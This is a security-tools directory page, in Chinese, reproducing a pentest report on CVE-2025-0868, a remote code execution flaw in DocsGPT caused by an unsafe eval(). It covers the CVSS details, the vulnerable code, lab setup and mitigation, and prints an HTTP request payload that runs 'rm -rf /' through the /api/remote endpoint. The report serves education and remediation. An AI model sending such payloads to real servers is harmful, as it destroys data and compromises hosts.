Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-0868 — # CVE-2025-0868 详细渗透测试报告与漏洞利用演示 针对 DocsGPT 中通过不安全 `eval()` 实现的关键远程代码执行(RCE)漏洞的详细渗透测试报告与漏洞利用演示,包括实验环境搭建、载荷构造及缓解策略。 | Kitploit
工具/GitHubGitHub/aidana-gift/cve-2025-0868
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubaidana-gift/cve-2025-0868

CVE-2025-0868

# CVE-2025-0868 详细渗透测试报告与漏洞利用演示 针对 DocsGPT 中通过不安全 `eval()` 实现的关键远程代码执行(RCE)漏洞的详细渗透测试报告与漏洞利用演示,包括实验环境搭建、载荷构造及缓解策略。

查看仓库
1121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

渗透测试项目报告:利用CVE-2025-0868 (DocsGPT JSON Eval远程代码执行)

1. 引言

一个严重的远程代码执行(RCE)漏洞(CVE-2025-0868)于2025年2月20日被披露,存在于开源DocsGPT库中,由在解析JSON有效载荷时不安全地使用eval()函数引起。

关键细节:

  • 影响DocsGPT 0.8.1至0.12.0版本
  • CVSS 4.0评分为9.3(严重)
  • 允许未经身份验证、可通过网络访问的代码注入
  • 对机密性、完整性和可用性造成全面影响

关于CVE-2025-0868

该漏洞允许攻击者通过/api/remote端点运行任意Python代码。DocsGPT是一个开源生成式AI工具,可使用GPT模型查询项目文档。

项目目标

  • 分析漏洞的技术背景
  • 在受控实验室环境中复现
  • 展示利用影响
  • 提出缓解策略
  • 呈现结论

2. 漏洞分析

2.1 漏洞概述

类别详情
CVE IDCVE-2025-0868
受影响的软件DocsGPT v0.8.1 – v0.12.0
漏洞类型远程代码执行(RCE)
攻击向量基于网络(向/api/remote发送HTTP请求)
根本原因对不可信JSON输入不安全地使用eval()
影响服务器完全沦陷(任意命令执行)
CWE映射CWE-77: 对命令中特殊元素的不当中和

2.2 CVSS 4.0 细分

向量: AV:N/AC:L/PR:N/UI:N/VC:H/VI:H/VA:H
基础评分: 9.3(严重)

可利用性指标:

  • 攻击向量(AV): 网络(N)
  • 攻击复杂度(AC): 低(L)
  • 所需权限(PR): 无(N)
  • 用户交互(UI): 无(N)

影响指标:

  • 机密性(VC):高
  • 完整性(VI):高
  • 可用性(VA):高

2.3 技术深入分析

该漏洞存在于reddit_loader.py中,用户输入使用不安全的eval()函数进行处理:

root@kitploit:~
def load_data(self, inputs):
    data = eval(inputs)  # Vulnerable code
    client_id = data.get("client_id")
    client_secret = data.get("client_secret")
    user_agent = data.get("user_agent")

这允许攻击者在JSON字段中执行恶意Python代码: POST /api/remote HTTP/1.1 Content-Type: application/json

{"data": "import('os').system('rm -rf /')"}

在DocsGPT中利用CVE-2025-0868

3. 利用过程

3.1 实验环境搭建

为利用此漏洞,我们使用以下工具重建了易受攻击的环境和一个安全的工作空间:

  • 虚拟机:Kali Linux 2024
  • DocsGPT版本:0.12.0 (易受攻击版本:0.8.0 - 0.12.0)
  • 使用工具:Python, Docker

3.2 漏洞利用开发

我们开发了一个Python脚本,通过向/api/remote端点发送恶意有效载荷,利用不安全的eval()实现远程代码执行(RCE)。

关键利用步骤

  1. 侦察:通过HTTP头识别DocsGPT版本。
  2. 定义漏洞:/api/remote端点中的RCE。
  3. 有效载荷构造:注入Python代码。
  4. 利用:向/api/remote发送恶意JSON。

易受攻击请求示例

root@kitploit:~
POST /api/remote HTTP/1.1
Content-Type: application/json

{"data": "__import__('os').system('rm -rf /')"}

4. 应对措施与缓解

4.1 即时修复

更新至DocsGPT v0.12.1及后续版本

4.2 代码修复

将eval()替换为json.loads()。

链接:https://github.com/arc53/DocsGPT/blob/df9d432d29c1bbdf28abb3d35d129060b1964dd3/applicatio n/parser/remote/reddit_loader.py#L9

下载工具